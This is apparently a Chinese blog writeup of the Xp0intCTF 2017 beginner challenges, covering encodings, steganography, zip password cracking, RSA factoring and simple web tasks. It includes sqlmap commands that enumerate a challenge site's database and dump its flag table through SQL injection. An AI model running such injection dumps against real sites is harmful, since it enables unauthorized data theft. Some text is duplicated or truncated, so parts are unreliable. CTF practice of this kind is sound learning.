Xp0intCTF 2017 writeup
2017-10-23 18:28
1431 查看
记录第一场ctf
• hint提示,通过wiki搜索SGA,且提示是一种神秘文字
• 一一对应,得到flag
• 解压,以1.zip着手(出题人调皮)
• winhex打开1.zip
• base64解码得到flag
• 补充-常见码制
o Base 64编码:
dGVybWluYXRvcg==
oMD5:9adb6a0e0003fe1293737c39acc824
oSHA-1:ebabb7d2d2120312c0e7c9
o URL编码: %05 %37 %08
o HEX编码:74 65 72 6d 69 6e 61 74 6f 72
o JsFuck:[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[]
o Html编码:ΤΕ
o Unicode编码:r《》
• 用winhex打开
解题参考链接:
http://blog.csdn.net/linyacool/article/details/71506638
一开始找的是双图隐写,在查资料的时候发现了很多新思路,顺便贴一下链接
http://www.jianshu.com/p/02fd 4000
d5edd9fc
题目地址:
http://119.29.191.200/ctf/7fcdb7ba6de74b6e007efe1079540e0228817d26/
• 好多颜文字,复制粘贴后,f12打开开发者工具控制台,得到flag
解题参考链接:
http://blog.csdn.net/u012763794/article/details/50959166基础篇第5点
• 打开文件发现是一串乱序英文字母,且有标点,猜测是一段话打乱,替代解密。(话痨,鉴定完毕)
解题参考链接:
https://quipqiup.com/
• 模数分解
o 如果n比较小,那么可以通过工具进行直接n分解,从而得到私钥。如果n的大小小于256bit,那么我们通过本地工具即可爆破成功。例如采用windows平台的RSATool2v17,可以在几分钟内完成256bit的n的分解。
o 如果n在768bit或者更高,可以尝试使用一些在线的n分解网站,这些网站会存储一些已经分解成功的n,比如:http://factordb.com
• 知道e,p,q的情况下,可以解出d:
• RSA解密,得到flag
• 解题参考链接:
http://bobao.360.cn/learning/detail/3058.html
题目地址:
http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/
• sql注入,尝试后发现未过滤单引号,找到注入点
• 使用sqlmap,发现database是test1
• 补充-sqlmap基本命令
o sqlmap -u “http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” –current-db
o qlmap -u “http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” -D test1 –tables
o sqlmap -u “http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” -D test1 -T flag –columns
o sqlmap -u “http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” -D test1 -T flag -C flag –dump
• 打开文件,猜测是使用正则表达式找到符合要求的flag
• 不会正则,只能筛到17条flag,接下来就是ctrl+f了
题目地址:
http://119.29.191.200/ctf/2f83ff6a6a77e7aca11c87d1ee6f9b8fce10c821/
• Get请求,在url中使what=flag即可
题目地址:
http://119.29.191.200/ctf/cccfd063b99f899232d571d89d3f832308c0d0bc/
• 解压需要密码,经提示,可排除伪加密
• 使用AZPR破解密码
• 打开发现一面全白的图片,使用StegSolve即可。
SGA
看起来好像是一种神秘的文字…(得到的内容加flag{}提交,且全部小写)hint:Encyclopedia is your good friend!
• 去掉后缀,得到zip,解压得到一串文字• hint提示,通过wiki搜索SGA,且提示是一种神秘文字
• 一一对应,得到flag
弗拉戈在哪里?
小明整蛊舍友,将他舍友的兰博基尼钥匙锁在zip里面了,你能帮他找回钥匙吗?• 解压,以1.zip着手(出题人调皮)
• winhex打开1.zip
• base64解码得到flag
• 补充-常见码制
o Base 64编码:
dGVybWluYXRvcg==
oMD5:9adb6a0e0003fe1293737c39acc824
oSHA-1:ebabb7d2d2120312c0e7c9
o URL编码: %05 %37 %08
o HEX编码:74 65 72 6d 69 6e 61 74 6f 72
o JsFuck:[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[]
o Html编码:ΤΕ
o Unicode编码:r《》
弗拉戈在哪里2?
小明又回来整蛊舍友了,不过这次钥匙他直接归还给舍友了,他说很喜欢这首歌,你知道小明说的是哪一首吗?• 用winhex打开
犯人留下了信息
密室中有三个人,不是你,也不是我,好吧,是他们之中留下了信息而你却看不见,你快要被污死了,怎么办,选择自救吗,擦亮眼睛,答案就在眼前。Hint1: 盲水印
解题参考链接:
http://blog.csdn.net/linyacool/article/details/71506638
一开始找的是双图隐写,在查资料的时候发现了很多新思路,顺便贴一下链接
http://www.jianshu.com/p/02fd 4000
d5edd9fc
Xp0int大家庭
Xp0int日常,跑一下我们在干什么?题目地址:
http://119.29.191.200/ctf/7fcdb7ba6de74b6e007efe1079540e0228817d26/
• 好多颜文字,复制粘贴后,f12打开开发者工具控制台,得到flag
解题参考链接:
http://blog.csdn.net/u012763794/article/details/50959166基础篇第5点
好像说太多了
• 打开文件发现是一串乱序英文字母,且有标点,猜测是一段话打乱,替代解密。(话痨,鉴定完毕)
解题参考链接:
https://quipqiup.com/
EasyRSA
• 模数分解
o 如果n比较小,那么可以通过工具进行直接n分解,从而得到私钥。如果n的大小小于256bit,那么我们通过本地工具即可爆破成功。例如采用windows平台的RSATool2v17,可以在几分钟内完成256bit的n的分解。
o 如果n在768bit或者更高,可以尝试使用一些在线的n分解网站,这些网站会存储一些已经分解成功的n,比如:http://factordb.com
• 知道e,p,q的情况下,可以解出d:
• RSA解密,得到flag
• 解题参考链接:
http://bobao.360.cn/learning/detail/3058.html
一个简陋的博客 Web
前端的X同学做一半跑路了,反正功能实现了,能上传文章就行(逃。。。题目地址:
http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/
• sql注入,尝试后发现未过滤单引号,找到注入点
• 使用sqlmap,发现database是test1
• 补充-sqlmap基本命令
o sqlmap -u “http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” –current-db
o qlmap -u “http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” -D test1 –tables
o sqlmap -u “http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” -D test1 -T flag –columns
o sqlmap -u “http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” -D test1 -T flag -C flag –dump
重重flag背后隐藏的秘密
据说:真正的flag开头三位和结尾均为数字,第4位和倒数第3位为大写字母,聪明的你能找到它吗?• 打开文件,猜测是使用正则表达式找到符合要求的flag
• 不会正则,只能筛到17条flag,接下来就是ctrl+f了
《web安全入门第一课》
X同学不懂什么是get请求,请教Y同学,Y同学叫他上网看,并丢给他一个网站实践…题目地址:
http://119.29.191.200/ctf/2f83ff6a6a77e7aca11c87d1ee6f9b8fce10c821/
• Get请求,在url中使what=flag即可
《web安全入门第二课》
X同学学完了get请求,又开始好奇什么是post请求,请教y同学,y同学又丢给他一个网站实践….题目地址:
http://119.29.191.200/ctf/cccfd063b99f899232d571d89d3f832308c0d0bc/
一段矛盾的代码
这段代码好矛盾,真的能得到flag吗?这次真的加密了
加密的压缩包,就一定安全吗?• 解压需要密码,经提示,可排除伪加密
• 使用AZPR破解密码
一张含有信息的图片
古时候打仗,友军间通信为了不被敌人发现重要的情报,用了各种各样的方法隐藏信息,延续到了现代,又有了新的变化…• 打开发现一面全白的图片,使用StegSolve即可。
相关文章推荐
- 2017 火种CTF Writeup
- google ctf 2017 inst_prof writeup
- NJCTF 2017 web Writeup
- 2017-0CTF-simplesplin-write up
- 0ctf 2017 babyheap writeup
- HCTF 2017 bin Level1 Evr_Q Writeup
- SWPU CTF 2017 Web WriteUp
- 2017 429 ichunqiu ctf smallest(pwn300) writeup
- 0ctf 2017 kernel pwn knote write up
- 谁是卧底-CTF题目writeup
- ASIS CTF - 三个魔法Web关WriteUp
- CTF writeup 0_IDF实验室
- CTF writeup:开发者工具
- 某新生院赛CTF 移动题writeup
- CTF writeup:python脚本爆破zip密码
- CSAW CTF2014 write-up
- CTF-i春秋网鼎杯第一场misc部分writeup
- sharif ctf pwn t00p_secrets writeup
- 2017 bctf boj writeup
- TWCTF 2016 (Tokyo Westerns CTF ) WEB WriteUp